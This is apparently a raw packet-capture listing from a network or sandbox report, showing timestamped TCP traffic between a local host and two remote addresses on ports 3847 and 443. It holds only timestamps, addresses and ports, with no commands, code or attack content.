                                                                                                                                      Dec 18, 2024 19:28:43.071429968 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.071490049 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.071717024 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:43.072366953 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.072384119 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.072441101 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:43.074527025 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.074634075 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.074760914 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.272536039 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.393438101 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.393491030 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.514332056 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.806777954 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.807127953 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.807187080 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.807277918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.808561087 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.808685064 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.808999062 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.809010029 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.809078932 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.810069084 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.810084105 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.810158014 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.811696053 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.811743975 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.811897039 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.813422918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.813568115 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.813821077 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.815161943 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.815210104 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.815257072 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.816785097 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.816993952 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.817048073 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.818588972 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.818654060 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.818702936 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.820350885 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.820493937 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.820570946 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.822009087 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.822022915 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:45.822060108 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:45.916346073 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.035921097 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.036026955 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.155587912 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.242022991 CET49975443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:46.242053986 CET4434997545.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.242331982 CET49975443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:46.242533922 CET49975443192.168.2.645.149.241.141
                                                                                                                                      Dec 18, 2024 19:28:46.242548943 CET4434997545.149.241.141192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.448009014 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.448174000 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.448245049 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.448326111 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.449893951 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.449949026 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.449954033 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.449990034 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.450093985 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.451658010 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.451738119 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.451792955 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.452874899 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.452974081 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.453041077 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.454622030 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.454674006 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.454727888 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.456418991 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.456456900 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.456543922 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.458065033 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.458107948 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.458157063 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.459692955 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.460041046 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.460087061 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.461467028 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.461579084 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.461672068 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.463169098 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.463268995 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.463334084 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.465337992 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.465351105 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.465411901 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.466927052 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.467205048 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.467259884 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.469167948 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.469181061 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.469243050 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.470603943 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.470616102 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.470676899 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.471860886 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.471986055 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.472033978 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.473575115 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.473732948 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.473893881 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.475260019 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.475361109 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.475431919 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.476991892 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.477164030 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.477324009 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.478835106 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.478975058 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.479115963 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.480652094 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.480664968 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.480707884 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.482705116 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.482758999 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.482974052 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.484172106 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.484297037 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.484903097 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.485764980 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.485779047 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.485848904 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.487492085 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.487543106 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.487715006 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.489243031 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.489311934 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.489394903 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.491533041 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.491596937 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.491719961 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.493020058 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.493031979 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.493083000 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.494762897 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.494828939 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.494954109 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.496285915 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.496296883 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.496356964 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.497842073 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.497982979 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.498027086 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.499505043 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.499686956 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.500413895 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.501241922 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.501388073 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.501562119 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.502989054 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.503051996 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.503165007 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.504666090 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.504796982 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.504961014 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.506506920 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.506519079 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.506568909 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.508146048 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.508164883 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.508244991 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.510034084 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.510046005 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.510096073 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.511584044 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.511744976 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.511790037 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.513323069 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.554141998 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.633879900 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.753459930 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:46.753642082 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:46.873462915 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.198620081 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.199127913 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.199141979 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.199214935 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.200442076 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.200524092 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.204890966 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.205012083 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.205066919 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.205760956 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.205879927 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.205982924 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.206939936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.207030058 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.207087994 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.208664894 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.208718061 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.208770990 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.209732056 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.209783077 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.209846973 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.211385012 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.211513996 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.211572886 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.213140011 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.213237047 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.213301897 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.214844942 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.215080023 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.215145111 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.216604948 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.216717005 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.216967106 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.218331099 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.218377113 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.218525887 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.220150948 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.220269918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.221755981 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.221817970 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.221899986 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.223488092 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.223551989 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.223602057 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.223689079 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.225306988 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.225414038 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.225461006 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.226946115 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.227044106 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.227108002 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.228724957 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.228863955 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.228920937 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.230379105 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.230398893 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.230492115 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.232134104 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.232361078 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.232404947 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.233807087 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.233926058 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.233974934 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.235848904 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.235861063 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.235912085 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.237348080 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.237514973 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.237689972 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.239031076 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.239123106 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.239331007 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.240756035 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.240926027 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.240982056 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.242539883 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.242655039 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.242757082 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.244210958 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.244347095 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.244396925 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.245960951 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.246124029 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.246175051 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.247657061 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.247747898 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.247805119 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.249356985 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.249442101 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.249733925 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.251548052 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.251626015 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.251672983 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.253016949 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.253118038 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.253195047 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.254534960 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.254641056 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.254694939 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.256396055 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.256473064 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.256647110 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.258054018 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.258131981 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.258199930 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.259757042 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.260052919 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.260330915 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.261670113 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.261765957 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.261811972 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.263236046 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.263333082 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.263391018 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.265047073 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.265216112 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.265269041 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.266659021 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.266774893 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.266850948 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.268403053 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.268511057 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.268568993 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.270150900 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.270239115 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.270287991 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.271845102 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.271955967 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:47.272008896 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:47.273572922 CET38474995987.120.127.215192.168.2.6
